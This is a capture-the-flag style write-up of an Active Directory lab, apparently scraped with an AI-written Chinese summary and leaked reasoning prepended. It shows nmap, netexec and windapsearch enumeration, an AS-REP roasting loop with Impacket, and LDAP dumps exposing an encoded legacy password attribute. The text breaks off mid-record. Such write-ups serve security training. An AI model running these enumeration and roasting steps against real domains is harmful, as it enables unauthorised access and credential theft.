好的,我现在需要帮助用户总结一篇文章的内容,并控制在100字以内。首先,我得仔细阅读文章,理解其主要情节和关键点。 这篇文章讲述了一个黑客通过匿名LDAP枚举、SMB访问、数据库分析和.NET反编译等多种技术,逐步入侵一个Active Directory环境的过程。最终,他成功获得了管理员权限,拿到了root.txt。 接下来,我需要提取关键步骤:匿名LDAP查询获取用户列表,发现自定义属性泄露密码,使用SMB访问文件,分析数据库和反编译.NET程序获取解密密钥,最后利用回收站恢复被删除的管理员账户并获得权限。 最后,将这些步骤简洁地整合成一段不超过100字的总结。 </think> 文章描述了一名黑客通过匿名LDAP枚举、SMB访问、数据库分析和.NET反编译等多种技术逐步入侵Active Directory环境的过程。最终成功获取管理员权限并获得root.txt。 2026-3-11 04:40:16 Author: infosecwriteups.com(查看原文) 阅读量:7 收藏
Press enter or click to view image in full size
Continuing my mastery of the AD journey.
We’ll start the way we always do — by running an nmap scan.
If you’ve read any of my previous articles, you already know there are certain things that immediately pop out.
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-01 19:15 -0500
Nmap scan report for 10.129.42.114
Host is up (0.035s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-02 00:15:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|2012|8.1 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (92%), Microsoft Windows Vista or Windows 7 (92%), Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windowsHost script results:
| smb2-time:
| date: 2026-03-02T00:16:54
|_ start_date: 2026-03-01T23:59:04
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
|_clock-skew: -1s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.22 seconds
jbrown@Jabaris-MacBook-Pro cascade %
We can see LDAP running on ports 389 and 3268, SMB on 445, and WinRM on 5985.
These are going to be crucial for our enumeration.
- LDAP gives us the directory — users, groups, computers, and domain structure.
- SMB gives us access to shares and potential credential exposure.
- WinRM gives us a path for remote access once we obtain valid credentials.
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Host script results:
| smb2-time:
| date: 2026-03-02T00:16:54
|_ start_date: 2026-03-01T23:59:04
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
|_clock-skew: -1sWe can try using netexec to enumerate SMB, but it looks like anonymous login isn’t enabled since we’re getting authentication failures.
jbrown@Jabaris-MacBook-Pro cascade % nxc smb 10.129.42.114 -u anonymous -p ""
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [-] cascade.local\anonymous: STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro cascade % nxc smb 10.129.42.114 -u anonymous -p anonymous
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [-] cascade.local\anonymous:anonymous STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro cascade %Since we had no luck with SMB, we can pivot.
LDAP is exposed on port 389, so we can try querying it directly using windapsearch to begin enumerating the domain.
If anonymous bind is allowed, this can give us valuable information like:
- Domain name
- Users
- Group
- Computers
- Potential descriptions or comments that leak credentials
When SMB shuts the door, LDAP sometimes leaves a window open.
jbrown@Jabaris-MacBook-Pro windapsearch % ls
LICENSE README.md requirements.txt windapsearch_py2.py windapsearch.py
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
Alright — anonymous bind works.
That’s a good sign. This is looking promising.
If the directory is allowing anonymous queries, that means we can start pulling real information from the domain.
users
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None[+] Enumerating all AD users
[+] Found 15 users:
cn: CascGuest
userPrincipalName: [email protected]
cn: ArkSvc
userPrincipalName: [email protected]
cn: Steve Smith
userPrincipalName: [email protected]
cn: Ryan Thompson
userPrincipalName: [email protected]
cn: Util
userPrincipalName: [email protected]
cn: James Wakefield
userPrincipalName: [email protected]
cn: Stephanie Hickson
userPrincipalName: [email protected]
cn: John Goodhand
userPrincipalName: [email protected]
cn: Adrian Turnbull
userPrincipalName: [email protected]
cn: Edward Crowe
userPrincipalName: [email protected]
cn: Ben Hanson
userPrincipalName: [email protected]
cn: David Burman
userPrincipalName: [email protected]
cn: BackupSvc
userPrincipalName: [email protected]
cn: Joseph Allen
userPrincipalName: [email protected]
cn: Ian Croft
userPrincipalName: [email protected]
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
groups:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -G
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None[+] Enumerating all AD groups
[+] Found 38 groups:
cn: Users
distinguishedName: CN=Users,CN=Builtin,DC=cascade,DC=local
cn: Guests
distinguishedName: CN=Guests,CN=Builtin,DC=cascade,DC=local
cn: Remote Desktop Users
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=cascade,DC=local
cn: Network Configuration Operators
distinguishedName: CN=Network Configuration Operators,CN=Builtin,DC=cascade,DC=local
cn: Performance Monitor Users
distinguishedName: CN=Performance Monitor Users,CN=Builtin,DC=cascade,DC=local
cn: Performance Log Users
distinguishedName: CN=Performance Log Users,CN=Builtin,DC=cascade,DC=local
cn: Distributed COM Users
distinguishedName: CN=Distributed COM Users,CN=Builtin,DC=cascade,DC=local
cn: IIS_IUSRS
distinguishedName: CN=IIS_IUSRS,CN=Builtin,DC=cascade,DC=local
cn: Cryptographic Operators
distinguishedName: CN=Cryptographic Operators,CN=Builtin,DC=cascade,DC=local
cn: Event Log Readers
distinguishedName: CN=Event Log Readers,CN=Builtin,DC=cascade,DC=local
cn: Certificate Service DCOM Access
distinguishedName: CN=Certificate Service DCOM Access,CN=Builtin,DC=cascade,DC=local
cn: Domain Computers
distinguishedName: CN=Domain Computers,CN=Users,DC=cascade,DC=local
cn: Cert Publishers
distinguishedName: CN=Cert Publishers,CN=Users,DC=cascade,DC=local
cn: Domain Users
distinguishedName: CN=Domain Users,CN=Users,DC=cascade,DC=local
cn: Domain Guests
distinguishedName: CN=Domain Guests,CN=Users,DC=cascade,DC=local
cn: Group Policy Creator Owners
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=cascade,DC=local
cn: RAS and IAS Servers
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=cascade,DC=local
cn: Pre-Windows 2000 Compatible Access
distinguishedName: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=cascade,DC=local
cn: Incoming Forest Trust Builders
distinguishedName: CN=Incoming Forest Trust Builders,CN=Builtin,DC=cascade,DC=local
cn: Windows Authorization Access Group
distinguishedName: CN=Windows Authorization Access Group,CN=Builtin,DC=cascade,DC=local
cn: Terminal Server License Servers
distinguishedName: CN=Terminal Server License Servers,CN=Builtin,DC=cascade,DC=local
cn: Allowed RODC Password Replication Group
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=cascade,DC=local
cn: Denied RODC Password Replication Group
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=cascade,DC=local
cn: Enterprise Read-only Domain Controllers
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=cascade,DC=local
cn: DnsAdmins
distinguishedName: CN=DnsAdmins,CN=Users,DC=cascade,DC=local
cn: DnsUpdateProxy
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=cascade,DC=local
cn: IT
distinguishedName: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Production
distinguishedName: CN=Production,OU=Groups,OU=UK,DC=cascade,DC=local
cn: HR
distinguishedName: CN=HR,OU=Groups,OU=UK,DC=cascade,DC=local
cn: AD Recycle Bin
distinguishedName: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Backup
distinguishedName: CN=Backup,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Temps
distinguishedName: CN=Temps,OU=Groups,OU=UK,DC=cascade,DC=local
cn: WinRMRemoteWMIUsers__
distinguishedName: CN=WinRMRemoteWMIUsers__,CN=Users,DC=cascade,DC=local
cn: Remote Management Users
distinguishedName: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Factory
distinguishedName: CN=Factory,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Finance
distinguishedName: CN=Finance,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Audit Share
distinguishedName: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Data Share
distinguishedName: CN=Data Share,OU=Groups,OU=UK,DC=cascade,DC=local
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
computers:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -C
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None[+] Enumerating all AD computers
[+] Found 1 computers:
cn: CASC-DC1
operatingSystem: Windows Server 2008 R2 Standard
operatingSystemVersion: 6.1 (7601)
operatingSystemServicePack: Service Pack 1
dNSHostName: CASC-DC1.cascade.local
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
unconstrained delegation:
^^ If a computer account has unconstrained delegation enabled, it means that when a user authenticates to that machine, their TGT can be stored in memory. We can potentially extract those tickets and impersonate users to access other services.
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 --unconstrained-computers
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Attempting to enumerate all computer objects with unconstrained delegation
[+] Found 1 computers with unconstrained delegation:CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local
dNSHostName: CASC-DC1.cascade.local
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
So that’s good to keep in mind — we may be able to leverage that later to grant ourselves a ticket.
Now, since we were able to get an anonymous bind and pull a list of usernames, we can move into something more interesting.
A well-known attack: AS-REP Roasting.
The idea here is simple.
If a user has Kerberos pre-authentication disabled, we can request an AS-REP from the domain controller without knowing the password.
If pre-auth is not required, the KDC will return encrypted material tied to that user’s password — which we can then crack offline.
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croftNext, we can use Impacket’s GetNPUsers script.
This will loop through our list of usernames and query Kerberos for accounts that have pre-authentication disabled.
If we’re lucky, the domain controller will return an AS-REP for one of the users.
jbrown@Jabaris-MacBook-Pro examples % while read p; do python3 GetNPUsers.py cascade.local/"$p" -request -no-pass -dc-ip 10.129.42.114 >> hash.txt; done < ../../../cascade/users.txt jbrown@Jabaris-MacBook-Pro cascade % cat hash.txt
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies [*] Getting TGT for CascGuest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
jbrown@Jabaris-MacBook-Pro cascade %
Looks like no luck — no hashes returned.
That tells me pre-authentication is likely enabled across the board.
I might’ve jumped the gun a bit.
So instead of forcing the attack path, let’s go back to enumeration.
I already have the usernames, so now I can loop through each one and dig deeper.
while read u;do python3 ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -l "$u" --full; done < ../../cascade/users.txtjbrown@Jabaris-MacBook-Pro windapsearch % while read u;do python3 ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -l "$u" --full; done < ../../cascade/users.txt
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "CascGuest"
[+] Using DN: CN=CascGuest,CN=Users,DC=cascade,DC=localobjectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: CascGuest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109153140.0Z
whenChanged: 20200110160637.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local
uSNChanged: 45094
name: CascGuest
objectGUID: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: CascGuest
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200109175934.0Z
dSCorePropagationData: 20200109154857.0Z
dSCorePropagationData: 16010714223649.0Z
lastLogonTimestamp: 132230700642958462
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "arksvc"
[+] Using DN: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: ArkSvc
distinguishedName: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109161820.0Z
whenChanged: 20200323113833.0Z
displayName: ArkSvc
uSNCreated: 12799
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295021
name: ArkSvc
objectGUID: ELXj5FhFXUmr2tAqpnaTNA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132248055409887841
pwdLastSet: 132230603002172876
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: arksvc
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294371134322815
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "s.smith"
[+] Using DN: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247275952778272
lastLogoff: 0
lastLogon: 132247275990842339
scriptPath: MapAuditDrive.vbs
pwdLastSet: 132247150854857364
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUwQAAA==
accountExpires: 9223372036854775807
logonCount: 16
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109180813.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294366735115088
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "r.thompson"
[+] Using DN: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "util"
[+] Using DN: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Util
distinguishedName: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109194521.0Z
whenChanged: 20200128180947.0Z
displayName: Util
uSNCreated: 24650
uSNChanged: 245850
name: Util
objectGUID: GdAgZzaP8E6S7CzuIP8sag==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132247085871071226
pwdLastSet: 132233548311955855
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVwQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: util
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132247085871071226
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "j.wakefield"
[+] Using DN: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: James Wakefield
sn: Wakefield
givenName: James
distinguishedName: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109203444.0Z
whenChanged: 20200115215201.0Z
displayName: James Wakefield
uSNCreated: 28741
uSNChanged: 118849
name: James Wakefield
objectGUID: 6SX/H/Sf5UOkC8IjbIii7A==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132230756844150124
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFXAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.wakefield
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109203444.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "s.hickson"
[+] Using DN: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Stephanie Hickson
sn: Hickson
givenName: Stephanie
distinguishedName: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113012427.0Z
whenChanged: 20200115215221.0Z
displayName: Stephanie Hickson
uSNCreated: 65594
memberOf: CN=HR,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 118853
name: Stephanie Hickson
objectGUID: rCGbAiT7r0CiOzKwLPa8NQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233522678003963
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFYQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: s.hickson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113012427.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "j.goodhand"
[+] Using DN: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: John Goodhand
